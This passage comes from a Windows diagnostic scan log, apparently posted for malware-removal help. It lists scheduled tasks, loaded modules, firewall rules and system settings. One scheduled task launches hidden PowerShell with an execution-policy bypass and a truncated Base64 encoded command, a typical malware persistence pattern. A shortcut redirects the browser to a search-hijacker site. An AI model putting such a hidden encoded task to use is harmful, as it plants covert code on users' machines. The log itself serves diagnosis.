    Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
    Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
    Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {EC2D2A3E-E44B-44C6-8E6E-EA7A037E1BFF} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - System32\Tasks\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9436 more characters).
    Task: {F3AF02E3-81A9-485B-B1B6-519881BEBF51} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
    Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157

    ==================== Loaded Modules (Whitelisted) ==============

    2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
    2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
    2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
    2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
    2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
    2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
    2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
    2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
    2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
    2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
    2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
    2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
    2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
    2016-02-29 19:32 - 2016-02-29 19:32 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022900\algo.dll
    2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
    2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
    2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    There are 7870 more sites.

    There are 7870 more sites.


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts

    There are 15468 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
    DNS Servers: 82.163.143.171 - 82.163.142.173
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
    FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
    FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
    FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
    FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
    FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
